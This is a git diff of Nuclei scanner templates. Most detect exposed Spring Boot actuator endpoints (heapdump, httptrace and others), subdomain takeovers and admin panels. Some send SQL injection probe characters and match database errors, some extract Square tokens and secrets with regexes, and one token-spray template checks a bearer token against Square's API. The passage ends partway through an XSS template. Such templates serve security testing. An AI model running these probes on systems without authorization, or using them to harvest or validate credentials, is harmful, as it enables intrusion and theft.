e9bd72d0ef..f753b4ffbf 100644 --- a/nuclei-templates/Other/springboot-gateway-10453.yaml +++ b/nuclei-templates/Other/springboot-gateway-10453.yaml @@ -1,4 +1,5 @@ id: springboot-gateway + info: name: Detect Spring Gateway Actuator author: wdahlenb @@ -6,11 +7,13 @@ info: description: Sensitive environment variables may not be masked tags: springboot,exposure reference: https://wya.pl/2021/12/20/bring-your-own-ssrf-the-gateway-actuator/ + requests: - method: GET path: - "{{BaseURL}}/gateway/routes" - "{{BaseURL}}/actuator/gateway/routes" + stop-at-first-match: true matchers-condition: and matchers: @@ -20,10 +23,12 @@ requests: - "predicate" - "route_id" condition: and + - type: word part: header words: - "application/json" + - type: status status: - 200 diff --git a/nuclei-templates/Other/springboot-h2-db-rce.yaml b/nuclei-templates/Other/springboot-h2-db-rce-10455.yaml similarity index 100% rename from nuclei-templates/Other/springboot-h2-db-rce.yaml rename to nuclei-templates/Other/springboot-h2-db-rce-10455.yaml diff --git a/nuclei-templates/Other/springboot-health-10459.yaml b/nuclei-templates/Other/springboot-health-10459.yaml deleted file mode 100644 index 42339354c4..0000000000 --- a/nuclei-templates/Other/springboot-health-10459.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: springboot-health - -info: - name: Detect Springboot Health Actuator - author: pussycat0x - severity: info - description: Additional routes may be displayed - tags: springboot,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}/health" - - "{{BaseURL}}/actuator/health" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"status"' - - '"diskSpace"' - - '"jms"' - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/springboot-health.yaml b/nuclei-templates/Other/springboot-health.yaml new file mode 100644 index 0000000000..03ab2172d4 --- /dev/null +++ b/nuclei-templates/Other/springboot-health.yaml @@ -0,0 +1,24 @@ +id: springboot-health +info: + name: Detect Springboot Health Actuator + author: pussycat0x + severity: info + description: Additional routes may be displayed + tags: springboot,exposure +requests: + - method: GET + path: + - "{{BaseURL}}/health" + - "{{BaseURL}}/actuator/health" + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"status"' + - '"diskSpace"' + - '"jms"' + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/springboot-heapdump.yaml b/nuclei-templates/Other/springboot-heapdump.yaml new file mode 100644 index 0000000000..c84da82205 --- /dev/null +++ b/nuclei-templates/Other/springboot-heapdump.yaml @@ -0,0 +1,29 @@ +id: springboot-heapdump +info: + name: Spring Boot Actuator - Heap Dump Detection + author: that_juan_,dwisiswant0,wdahlenb + severity: critical + description: A Spring Boot Actuator heap dump was detected. A heap dump is a snapshot of JVM memory, which could expose environment variables and HTTP requests. + reference: + - https://github.com/pyn3rd/Spring-Boot-Vulnerability + tags: springboot,exposure +requests: + - method: GET + path: + - "{{BaseURL}}/heapdump" + - "{{BaseURL}}/actuator/heapdump" + max-size: 2097152 # 2MB - Max Size to read from server response + matchers-condition: and + matchers: + - type: binary + part: body + binary: + - "4a4156412050524f46494c45" # "JAVA PROFILE" + - "4850524f46" # "HPROF" + - "1f8b080000000000" # Gunzip magic byte + condition: or + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/20 diff --git a/nuclei-templates/Other/springboot-httptrace-10467.yaml b/nuclei-templates/Other/springboot-httptrace-10467.yaml new file mode 100644 index 0000000000..f91a784635 --- /dev/null +++ b/nuclei-templates/Other/springboot-httptrace-10467.yaml @@ -0,0 +1,36 @@ +id: springboot-httptrace + +info: + name: Detect Springboot httptrace + author: that_juan_,dwisiswant0,wdahlenb + severity: low + description: View recent HTTP requests and responses + tags: springboot,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/httptrace" + - "{{BaseURL}}/actuator/httptrace" + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"traces"' + - '"timestamp"' + - '"principal"' + - '"session"' + condition: and + + - type: status + status: + - 200 + + - type: word + words: + - "application/json" + - "application/vnd.spring-boot.actuator" + - "application/vnd.spring-boot.actuator.v1+json" + condition: or + part: header diff --git a/nuclei-templates/Other/springboot-httptrace.yaml b/nuclei-templates/Other/springboot-httptrace.yaml deleted file mode 100644 index 6671df8ac9..0000000000 --- a/nuclei-templates/Other/springboot-httptrace.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: springboot-httptrace -info: - name: Detect Springboot httptrace - author: that_juan_,dwisiswant0,wdahlenb - severity: low - description: View recent HTTP requests and responses - tags: springboot,exposure -requests: - - method: GET - path: - - "{{BaseURL}}/httptrace" - - "{{BaseURL}}/actuator/httptrace" - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"traces"' - - '"timestamp"' - - '"principal"' - - '"session"' - condition: and - - type: status - status: - - 200 - - type: word - words: - - "application/json" - - "application/vnd.spring-boot.actuator" - - "application/vnd.spring-boot.actuator.v1+json" - condition: or - part: header diff --git a/nuclei-templates/Other/springboot-info-10470.yaml b/nuclei-templates/Other/springboot-info-10470.yaml deleted file mode 100644 index c9d77a9f5f..0000000000 --- a/nuclei-templates/Other/springboot-info-10470.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: springboot-info - -info: - name: Detect Springboot Information page - author: philippedelteil - severity: info - description: Displays app name and version information among others values - tags: springboot - -requests: - - method: GET - path: - - "{{BaseURL}}/info" - - "{{BaseURL}}/actuator/info" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"build"' - - '"artifact"' - condition: and - - - type: status - status: - - 200 - - - type: word - words: - - "application/json" - - "application/vnd.spring-boot.actuator" - - "application/vnd.spring-boot.actuator.v2+json" - - "application/vnd.spring-boot.actuator.v1+json" - condition: or - part: header diff --git a/nuclei-templates/Other/springboot-info.yaml b/nuclei-templates/Other/springboot-info.yaml new file mode 100644 index 0000000000..899a74d592 --- /dev/null +++ b/nuclei-templates/Other/springboot-info.yaml @@ -0,0 +1,32 @@ +id: springboot-info +info: + name: Detect Springboot Information page + author: philippedelteil + severity: info + description: Displays app name and version information among others values + tags: springboot +requests: + - method: GET + path: + - "{{BaseURL}}/info" + - "{{BaseURL}}/actuator/info" + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"build"' + - '"artifact"' + condition: and + - type: word + part: header + words: + - "application/json" + - "application/vnd.spring-boot.actuator" + - "application/vnd.spring-boot.actuator.v2+json" + - "application/vnd.spring-boot.actuator.v1+json" + condition: or + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/springboot-loggers-10475.yaml b/nuclei-templates/Other/springboot-loggers-10475.yaml new file mode 100644 index 0000000000..15abdb57f7 --- /dev/null +++ b/nuclei-templates/Other/springboot-loggers-10475.yaml @@ -0,0 +1,34 @@ +id: springboot-loggers + +info: + name: Detect Springboot Loggers + author: that_juan_,dwisiswant0,wdahlenb + severity: low + tags: springboot,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/loggers" + - "{{BaseURL}}/actuator/loggers" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"loggers"' + - '"levels"' + condition: and + + - type: status + status: + - 200 + + - type: word + words: + - "application/json" + - "application/vnd.spring-boot.actuator" + - "application/vnd.spring-boot.actuator.v1+json" + condition: or + part: header diff --git a/nuclei-templates/Other/springboot-loggers-10476.yaml b/nuclei-templates/Other/springboot-loggers-10476.yaml deleted file mode 100644 index b5e9d66968..0000000000 --- a/nuclei-templates/Other/springboot-loggers-10476.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: springboot-loggers -info: - name: Detect Springboot Loggers - author: that_juan_,dwisiswant0,wdahlenb - severity: low - tags: springboot,exposure -requests: - - method: GET - path: - - "{{BaseURL}}/loggers" - - "{{BaseURL}}/actuator/loggers" - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"loggers"' - - '"levels"' - condition: and - - type: status - status: - - 200 - - type: word - words: - - "application/json" - - "application/vnd.spring-boot.actuator" - - "application/vnd.spring-boot.actuator.v1+json" - condition: or - part: header diff --git a/nuclei-templates/Other/springboot-mappings-10480.yaml b/nuclei-templates/Other/springboot-mappings-10480.yaml new file mode 100644 index 0000000000..d9abf6d280 --- /dev/null +++ b/nuclei-templates/Other/springboot-mappings-10480.yaml @@ -0,0 +1,31 @@ +id: springboot-mappings +info: + name: Detect Springboot Mappings Actuator + author: that_juan_,dwisiswant0,wdahlenb + severity: low + description: Additional routes may be displayed + tags: springboot,exposure +requests: + - method: GET + path: + - "{{BaseURL}}/mappings" + - "{{BaseURL}}/actuator/mappings" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "mappings" + - "method" + - "produces" + condition: and + - type: status + status: + - 200 + - type: word + words: + - "application/json" + - "application/vnd.spring-boot.actuator" + - "application/vnd.spring-boot.actuator.v1+json" + condition: or + part: header diff --git a/nuclei-templates/Other/springboot-mappings-10481.yaml b/nuclei-templates/Other/springboot-mappings-10481.yaml deleted file mode 100644 index c6b4f9bfef..0000000000 --- a/nuclei-templates/Other/springboot-mappings-10481.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: springboot-mappings - -info: - name: Detect Springboot Mappings Actuator - author: that_juan_,dwisiswant0,wdahlenb - severity: low - description: Additional routes may be displayed - tags: springboot,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}/mappings" - - "{{BaseURL}}/actuator/mappings" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "mappings" - - "method" - - "produces" - condition: and - - type: status - status: - - 200 - - type: word - words: - - "application/json" - - "application/vnd.spring-boot.actuator" - - "application/vnd.spring-boot.actuator.v1+json" - condition: or - part: header diff --git a/nuclei-templates/Other/springboot-metrics-10482.yaml b/nuclei-templates/Other/springboot-metrics-10482.yaml new file mode 100644 index 0000000000..7c2b07e57d --- /dev/null +++ b/nuclei-templates/Other/springboot-metrics-10482.yaml @@ -0,0 +1,32 @@ +id: springboot-metrics + +info: + name: Detect Springboot metrics Actuator + author: pussycat0x + severity: low + description: Additional routes may be displayed + tags: springboot,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/metrics" + - "{{BaseURL}}/actuator/metrics" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "mem" + - "mem.free" + - "processors" + - "instance.uptime" + - "systemload.average" + - "nonheap.init" + - "heap.committed" + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/springboot-metrics-10483.yaml b/nuclei-templates/Other/springboot-metrics-10483.yaml deleted file mode 100644 index 8ec00b87b8..0000000000 --- a/nuclei-templates/Other/springboot-metrics-10483.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: springboot-metrics -info: - name: Detect Springboot metrics Actuator - author: pussycat0x - severity: low - description: Additional routes may be displayed - tags: springboot,exposure -requests: - - method: GET - path: - - "{{BaseURL}}/metrics" - - "{{BaseURL}}/actuator/metrics" - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "mem" - - "mem.free" - - "processors" - - "instance.uptime" - - "systemload.average" - - "nonheap.init" - - "heap.committed" - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/springboot-threaddump-10487.yaml b/nuclei-templates/Other/springboot-threaddump-10487.yaml index 200524a679..98db514631 100644 --- a/nuclei-templates/Other/springboot-threaddump-10487.yaml +++ b/nuclei-templates/Other/springboot-threaddump-10487.yaml @@ -1,16 +1,19 @@ id: springboot-threaddump + info: name: Detect Springboot Thread Dump page author: philippedelteil severity: low - description: The threaddump endpoint provides a thread dump from the application's JVM. + description: The threaddump endpoint provides a thread dump from the application’s JVM. reference: https://docs.spring.io/spring-boot/docs/2.4.11-SNAPSHOT/actuator-api/htmlsingle/#threaddump tags: springboot + requests: - method: GET path: - "{{BaseURL}}/threaddump" - "{{BaseURL}}/actuator/threaddump" + matchers-condition: and matchers: - type: word @@ -19,9 +22,11 @@ requests: - '"threads":' - '"threadName":' condition: and + - type: status status: - 200 + - type: word words: - "application/json" diff --git a/nuclei-templates/Other/springboot-trace-10491.yaml b/nuclei-templates/Other/springboot-trace-10491.yaml new file mode 100644 index 0000000000..11c73c2c29 --- /dev/null +++ b/nuclei-templates/Other/springboot-trace-10491.yaml @@ -0,0 +1,31 @@ +id: springboot-trace +info: + name: Detect Springboot Trace Actuator + author: that_juan_ & dwisiswant0 & wdahlenb + severity: low + description: View recent HTTP requests and responses + tags: springboot,disclosure +requests: + - method: GET + path: + - "{{BaseURL}}/trace" + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"timestamp"' + - '"info"' + - '"method"' + - '"path"' + condition: and + - type: status + status: + - 200 + - type: word + words: + - "application/json" + - "application/vnd.spring-boot.actuator" + - "application/vnd.spring-boot.actuator.v1+json" + condition: or + part: header diff --git a/nuclei-templates/Other/springboot-trace.yaml b/nuclei-templates/Other/springboot-trace.yaml deleted file mode 100644 index b967e514f2..0000000000 --- a/nuclei-templates/Other/springboot-trace.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: springboot-trace -info: - name: Detect Springboot Trace Actuator - author: that_juan_,dwisiswant0,wdahlenb - severity: low - description: View recent HTTP requests and responses - tags: misconfig,springboot,exposure -requests: - - method: GET - path: - - "{{BaseURL}}/trace" - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"timestamp"' - - '"info"' - - '"method"' - - '"path"' - condition: and - - type: word - part: header - words: - - "application/json" - - "application/vnd.spring-boot.actuator" - - "application/vnd.spring-boot.actuator.v1+json" - condition: or - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/springboot_heapdump.yaml b/nuclei-templates/Other/springboot_heapdump.yaml deleted file mode 100644 index d8a33f5df9..0000000000 --- a/nuclei-templates/Other/springboot_heapdump.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: springboot-heapdump -info: - name: Spring Boot Actuator - Heap Dump Detection - author: that_juan_,dwisiswant0,wdahlenb - severity: critical - description: A Spring Boot Actuator heap dump was detected. A heap dump is a snapshot of JVM memory, which could expose environment variables and HTTP requests. - reference: - - https://github.com/pyn3rd/Spring-Boot-Vulnerability - tags: springboot,exposure -requests: - - method: GET - path: - - "{{BaseURL}}/heapdump" - - "{{BaseURL}}/actuator/heapdump" - stop-at-first-match: true - max-size: 2097152 # 2MB - Max Size to read from server response - matchers-condition: and - matchers: - - type: binary - part: body - binary: - - "4a4156412050524f46494c45" # "JAVA PROFILE" - - "4850524f46" # "HPROF" - - "1f8b080000000000" # Gunzip magic byte - condition: or - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/20 diff --git a/nuclei-templates/Other/sprintful-takeover-10494.yaml b/nuclei-templates/Other/sprintful-takeover-10494.yaml deleted file mode 100644 index 791e26095d..0000000000 --- a/nuclei-templates/Other/sprintful-takeover-10494.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: sprintful-takeover - -info: - name: Sprintful Takeover - author: Mhdsamx - severity: high - tags: takeover,sprintful - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'The user account associated with this calendar has been deactivated.' - - 'Please contact the owner of this calendar directly in order to book a meeting.' - - 'This domain name does not have a default page configured.' - condition: or - - - type: word - words: - - "Sprintful" \ No newline at end of file diff --git a/nuclei-templates/Other/sprintful-takeover-10495.yaml b/nuclei-templates/Other/sprintful-takeover-10495.yaml new file mode 100644 index 0000000000..65e4a817c9 --- /dev/null +++ b/nuclei-templates/Other/sprintful-takeover-10495.yaml @@ -0,0 +1,24 @@ +id: sprintful-takeover +info: + name: Sprintful Takeover + author: Mhdsamx + severity: high + tags: takeover,sprintful +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - 'The user account associated with this calendar has been deactivated.' + - 'Please contact the owner of this calendar directly in order to book a meeting.' + - 'This domain name does not have a default page configured.' + condition: or + - type: word + words: + - "Sprintful" diff --git a/nuclei-templates/Other/sql-dump-10496.yaml b/nuclei-templates/Other/sql-dump-10498.yaml similarity index 100% rename from nuclei-templates/Other/sql-dump-10496.yaml rename to nuclei-templates/Other/sql-dump-10498.yaml diff --git a/nuclei-templates/Other/sql-injection.yaml b/nuclei-templates/Other/sql-injection.yaml deleted file mode 100644 index 3a57109aa6..0000000000 --- a/nuclei-templates/Other/sql-injection.yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: SQL - -info: - name: SQL Injecion - author: pikpikcu - severity: critical - -requests: - - method: GET - path: - - - "{{BaseURL}}%27" - - "{{BaseURL}}%22" - - "{{BaseURL}}%5C" - - "{{BaseURL}}%2C" - - "{{BaseURL}}%2A" - - "{{BaseURL}}%60" - - matchers: - - type: regex - regex: - - "SQL syntax" - - "MySQL" - - "Unexpected end of command in statement" - - "Unexpected token.*?in statement" - - ".hsqldb" - - ".jdbc" - - "CLI Driver" - - "DB2 SQL error" - - "bdb2_" - - "SQLSTATE" - - "SQLCODE" - - "Warning" - - "SybSQLException" - - "sqlite" - - "SQLite3" - - "Sqlite" - - "SQLSTATE" - - "Error 500" - - "statementSQL" - part: body - - type: status - status: - - 500 - - 302 - - 400 - part: header diff --git a/nuclei-templates/Other/sql-monitor-10505.yaml b/nuclei-templates/Other/sql-monitor-10505.yaml deleted file mode 100644 index e9b23658ed..0000000000 --- a/nuclei-templates/Other/sql-monitor-10505.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: sql-monitor - -info: - name: SQL Monitor - author: dhiyaneshDK - severity: info - tags: panel - metadata: - shodan-query: 'html:"SQL Monitor"' - -requests: - - method: GET - path: - - '{{BaseURL}}/Account/LogIn?returnUrl=%2F&hasAttemptedCookie=True' - - matchers-condition: and - matchers: - - type: word - words: - - '

    JavaScript needs to be enabled for SQL Monitor to work properly.

    ' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/sql-monitor.yaml b/nuclei-templates/Other/sql-monitor.yaml new file mode 100644 index 0000000000..8f8f3bc82e --- /dev/null +++ b/nuclei-templates/Other/sql-monitor.yaml @@ -0,0 +1,20 @@ +id: sql-monitor +info: + name: SQL Monitor + author: dhiyaneshDK + severity: info + tags: panel + metadata: + shodan-query: 'html:"SQL Monitor"' +requests: + - method: GET + path: + - '{{BaseURL}}/Account/LogIn?returnUrl=%2F&hasAttemptedCookie=True' + matchers-condition: and + matchers: + - type: word + words: + - '

    JavaScript needs to be enabled for SQL Monitor to work properly.

    ' + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/sql-server-reporting-10509.yaml b/nuclei-templates/Other/sql-server-reporting-10509.yaml index bb0fa2dd5b..4e97bee905 100644 --- a/nuclei-templates/Other/sql-server-reporting-10509.yaml +++ b/nuclei-templates/Other/sql-server-reporting-10509.yaml @@ -1,9 +1,11 @@ id: sql-server-reporting + info: name: Detect Microsoft SQL Server Reporting author: puzzlepeaches severity: info - tags: tech,micrsoft + tags: tech,microsoft + requests: - method: GET path: diff --git a/nuclei-templates/Other/sqli.yaml b/nuclei-templates/Other/sqli.yaml new file mode 100644 index 0000000000..f6d042112a --- /dev/null +++ b/nuclei-templates/Other/sqli.yaml @@ -0,0 +1,47 @@ +id: SQL + +info: + name: SQL Injecion + author: pikpikcu + severity: critical + +requests: + - method: GET + path: + + - "{{BaseURL}}%27" + - "{{BaseURL}}%22" + - "{{BaseURL}}%5C" + - "{{BaseURL}}%2C" + - "{{BaseURL}}%2A" + - "{{BaseURL}}%60" + + matchers: + - type: regex + regex: + - "SQL syntax" + - "MySQL" + - "Unexpected end of command in statement" + - "Unexpected token.*?in statement" + - ".hsqldb" + - ".jdbc" + - "CLI Driver" + - "DB2 SQL error" + - "bdb2_" + - "SQLSTATE" + - "SQLCODE" + - "Warning" + - "SybSQLException" + - "sqlite" + - "SQLite3" + - "Sqlite" + - "SQLSTATE" + - "Error 500" + - "statementSQL" + part: body + - type: status + status: + - 500 + - 302 + - 400 + part: header diff --git a/nuclei-templates/Other/sqli_header (copy 1).yaml b/nuclei-templates/Other/sqli_header (copy 1).yaml index 832a9fc156..85e1b90acb 100644 --- a/nuclei-templates/Other/sqli_header (copy 1).yaml +++ b/nuclei-templates/Other/sqli_header (copy 1).yaml @@ -1,8 +1,10 @@ id: header-sqli + info: name: Request header based sqli - author: panch0r3d + author: panch0r3d (Thanks https://github.com/MR-pentestGuy for all of the Regexes) severity: high + requests: - method: GET path: @@ -18,6 +20,48 @@ requests: matchers: - type: regex regex: - - "(s|S)(q|Q)(l|L)" - - "(d|D)(a|A)(t|T)(a|A)(b|B)(a|A)(s|S)(e|E)" + - "(Transaction rollback|com.frontbase.jdbc|org.h2.jdbc|Unexpected end of command in statement|Unexpected token.*?in statement)" + - "(org.hsqldb.jdbc|CLI Driver.*?DB2|DB2 SQL error|bdb2_w+|SQLSTATE.+SQLCODE|com.ibm.db2.jcc)" + - "(Zend_Db_(Adapter|Statement)_Db2_Exception|DB2Exception|Warning.*?ifx_|Exception.*?Informix|Informix ODBC Driver)" + - "(ODBC Informix driver|com.informix.jdbc|weblogic.jdbc.informix|IfxException|Warning.*?ingres_|Ingres SQLSTATE|Ingres.*?Driver)" + - "(com.ingres.gcf.jdbc|Dynamic SQL Error|Warning.*?ibase_|org.firebirdsql.jdbc|Microsoft Access.*?Driver|JET Database Engine)" + - "(Access Database Engine|ODBC Microsoft Access|Syntax error .*?missing operator.*? in query expression|Driver.*? SQL.*? Server)" + - "(OLE DB.*? SQL Server|bSQL Server.*? Driver|Warning.*?(mssql|sqlsrv)_|SQL Server|System.Data.SqlClient.SqlException)" + - "(Exception.*?Roadhouse.Cms.|Microsoft SQL Native Client error |ODBC SQL Server Driver|ODBC Driver.*? for SQL Server)" + - "(SQLServer JDBC Driver|com.jnetdirect.jsql|macromedia.jdbc.sqlserver|Zend_Db_(Adapter|Statement)_Sqlsrv_Exception)" + - "(com.microsoft.sqlserver.jdbc|(Mssql|SqlSrv)|SQL(Srv|Server)Exception|SQL syntax.*?MySQL|Warning.*?mysqli?_)" + - "(MySQLSyntaxErrorException|valid MySQL result|check the manual that corresponds to your (MySQL|MariaDB) server version)" + - "(Unknown column .*? in .field list.|MySqlClient.|com.mysql.jdbc|Zend_Db_(Adapter|Statement)_Mysqli_Exception)" + - "(MySqlException|ORA-{5}|Oracle error|Oracle.*?Driver|Warning.*?(oci|ora)_|quoted string not properly terminated)" + - "(SQL command not properly ended|macromedia.jdbc.oracle|oracle.jdbc|Zend_Db_(Adapter|Statement)_Oracle_Exception)" + - "(OracleException|PostgreSQL.*?ERROR|Warning.*?pg|valid PostgreSQL result|Npgsql|PG.*?SyntaxError|org.postgresql.util.PSQLException)" + - "(ERROR.*?syntax error at or near|ERROR.*? parser.*? parse error at or near|PostgreSQL query failed|org.postgresql.jdbc)" + - "(PSQLException|SQL error.*?POS|Warning.*?maxdb|DriverSapDB|com.sap.dbtech.jdbc|SQLite.*?JDBCDriver|SQLite.Exception)" + - "((Microsoft|System).Data.SQLite.SQLiteException|Warning.*?(sqlite_|SQLite3)|SQLITE_ERROR|SQLite error)" + - "(sqlite3.OperationalError:|SQLite3.*?SQLException|org.sqlite.JDBC|Sqlite|SQLiteException|Warning.*?sybase_)" + - "(Sybase message|Sybase.*?Server message|SybSQLException|Sybase.Data.AseClient|com.sybase.jdbc)" part: body + extractors: + - type: regex + part: body + regex: + - "(Transaction rollback|com.frontbase.jdbc|org.h2.jdbc|Unexpected end of command in statement|Unexpected token.*?in statement)" + - "(org.hsqldb.jdbc|CLI Driver.*?DB2|DB2 SQL error|bdb2_w+|SQLSTATE.+SQLCODE|com.ibm.db2.jcc)" + - "(Zend_Db_(Adapter|Statement)_Db2_Exception|DB2Exception|Warning.*?ifx_|Exception.*?Informix|Informix ODBC Driver)" + - "(ODBC Informix driver|com.informix.jdbc|weblogic.jdbc.informix|IfxException|Warning.*?ingres_|Ingres SQLSTATE|Ingres.*?Driver)" + - "(com.ingres.gcf.jdbc|Dynamic SQL Error|Warning.*?ibase_|org.firebirdsql.jdbc|Microsoft Access.*?Driver|JET Database Engine)" + - "(Access Database Engine|ODBC Microsoft Access|Syntax error .*?missing operator.*? in query expression|Driver.*? SQL.*? Server)" + - "(OLE DB.*? SQL Server|bSQL Server.*? Driver|Warning.*?(mssql|sqlsrv)_|SQL Server|System.Data.SqlClient.SqlException)" + - "(Exception.*?Roadhouse.Cms.|Microsoft SQL Native Client error |ODBC SQL Server Driver|ODBC Driver.*? for SQL Server)" + - "(SQLServer JDBC Driver|com.jnetdirect.jsql|macromedia.jdbc.sqlserver|Zend_Db_(Adapter|Statement)_Sqlsrv_Exception)" + - "(com.microsoft.sqlserver.jdbc|(Mssql|SqlSrv)|SQL(Srv|Server)Exception|SQL syntax.*?MySQL|Warning.*?mysqli?_)" + - "(MySQLSyntaxErrorException|valid MySQL result|check the manual that corresponds to your (MySQL|MariaDB) server version)" + - "(Unknown column .*? in .field list.|MySqlClient.|com.mysql.jdbc|Zend_Db_(Adapter|Statement)_Mysqli_Exception)" + - "(MySqlException|ORA-{5}|Oracle error|Oracle.*?Driver|Warning.*?(oci|ora)_|quoted string not properly terminated)" + - "(SQL command not properly ended|macromedia.jdbc.oracle|oracle.jdbc|Zend_Db_(Adapter|Statement)_Oracle_Exception)" + - "(OracleException|PostgreSQL.*?ERROR|Warning.*?pg|valid PostgreSQL result|Npgsql|PG.*?SyntaxError|org.postgresql.util.PSQLException)" + - "(ERROR.*?syntax error at or near|ERROR.*? parser.*? parse error at or near|PostgreSQL query failed|org.postgresql.jdbc)" + - "(PSQLException|SQL error.*?POS|Warning.*?maxdb|DriverSapDB|com.sap.dbtech.jdbc|SQLite.*?JDBCDriver|SQLite.Exception)" + - "((Microsoft|System).Data.SQLite.SQLiteException|Warning.*?(sqlite_|SQLite3)|SQLITE_ERROR|SQLite error)" + - "(sqlite3.OperationalError:|SQLite3.*?SQLException|org.sqlite.JDBC|Sqlite|SQLiteException|Warning.*?sybase_)" + - "(Sybase message|Sybase.*?Server message|SybSQLException|Sybase.Data.AseClient|com.sybase.jdbc)" diff --git a/nuclei-templates/Other/square-access-token(1).yaml b/nuclei-templates/Other/square-access-token(1).yaml new file mode 100644 index 0000000000..5601c992e7 --- /dev/null +++ b/nuclei-templates/Other/square-access-token(1).yaml @@ -0,0 +1,17 @@ +id: square-access-token + +info: + name: Square Access Token + author: gaurang,daffainfo + severity: high + tags: token,file,square + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "EAAAE[a-zA-Z0-9_-]{59}" + - "sq0atp-[0-9A-Za-z\\-_]{22}" diff --git a/nuclei-templates/Other/square-oauth-secret(1).yaml b/nuclei-templates/Other/square-oauth-secret(1).yaml deleted file mode 100644 index 86392888a8..0000000000 --- a/nuclei-templates/Other/square-oauth-secret(1).yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: square-oauth-secret -info: - name: Square OAuth Secret - author: gaurang - severity: high - tags: token,file,square -file: - - extensions: - - all - extractors: - - type: regex - regex: - - "sq0csp-[0-9A-Za-z\\-_]{43}" diff --git a/nuclei-templates/Other/square.yaml b/nuclei-templates/Other/square.yaml new file mode 100644 index 0000000000..7ccb835189 --- /dev/null +++ b/nuclei-templates/Other/square.yaml @@ -0,0 +1,25 @@ +id: api-square + +info: + name: Square API Test + author: zzeitlin + reference: https://developer.squareup.com/explorer/square/locations-api/list-locations + severity: info + tags: token-spray,square + +self-contained: true +requests: + - method: GET + path: + - "https://connect.squareup.com/v2/locations" + - "https://connect.squareupsandbox.com/v2/locations" + headers: + Content-Type: application/json + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - 'errors' + negative: true diff --git a/nuclei-templates/Other/squid-analysis-report-generator-10513.yaml b/nuclei-templates/Other/squid-analysis-report-generator-10513.yaml new file mode 100644 index 0000000000..ccc3a9b84d --- /dev/null +++ b/nuclei-templates/Other/squid-analysis-report-generator-10513.yaml @@ -0,0 +1,31 @@ +id: squid-analysis-report-generator +info: + name: Squid Analysis Report Generator + author: geeknik + description: SARG is an open source tool that allows you to analyse the squid log files and generates beautiful reports in HTML format with information about users, IP addresses, top accessed sites, total bandwidth usage, elapsed time, downloads, access denied websites, daily reports, weekly reports and monthly reports. + reference: https://sourceforge.net/projects/sarg/ + severity: high + tags: sarg,exposure,logs +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Squid User Access Report" + - "Squid User's Access Report" + condition: or + - type: word + part: body + words: + - "Daily reports" + - "FILE/PERIOD" + condition: or + extractors: + - type: regex + part: body + regex: + - sarg-[0-99].[0-99].[0-99] diff --git a/nuclei-templates/Other/squid-analysis-report-generator.yaml b/nuclei-templates/Other/squid-analysis-report-generator.yaml deleted file mode 100644 index 83035e636f..0000000000 --- a/nuclei-templates/Other/squid-analysis-report-generator.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: squid-analysis-report-generator -info: - name: Squid Analysis Report Generator - author: geeknik - severity: high - description: SARG is an open source tool that allows you to analyse the squid log files and generates beautiful reports in HTML format with information about users, IP addresses, top accessed sites, total bandwidth usage, elapsed time, downloads, access denied websites, daily reports, weekly reports and monthly reports. - reference: - - https://sourceforge.net/projects/sarg/ - tags: sarg,exposure,logs -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Squid User Access Report" - - "Squid User's Access Report" - condition: or - - type: word - part: body - words: - - "Daily reports" - - "FILE/PERIOD" - condition: or - extractors: - - type: regex - part: body - regex: - - sarg-[0-99].[0-99].[0-99] diff --git a/nuclei-templates/Other/squirrelmail-add-xss-10515.yaml b/nuclei-templates/Other/squirrelmail-add-xss-10515.yaml deleted file mode 100644 index e1adc12d04..0000000000 --- a/nuclei-templates/Other/squirrelmail-add-xss-10515.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: squirrelmail-address-xss - -info: - name: SquirrelMail 1.4.2 Address Add Plugin - 'add.php' Cross-Site Scripting - author: dhiyaneshDk - severity: medium - description: 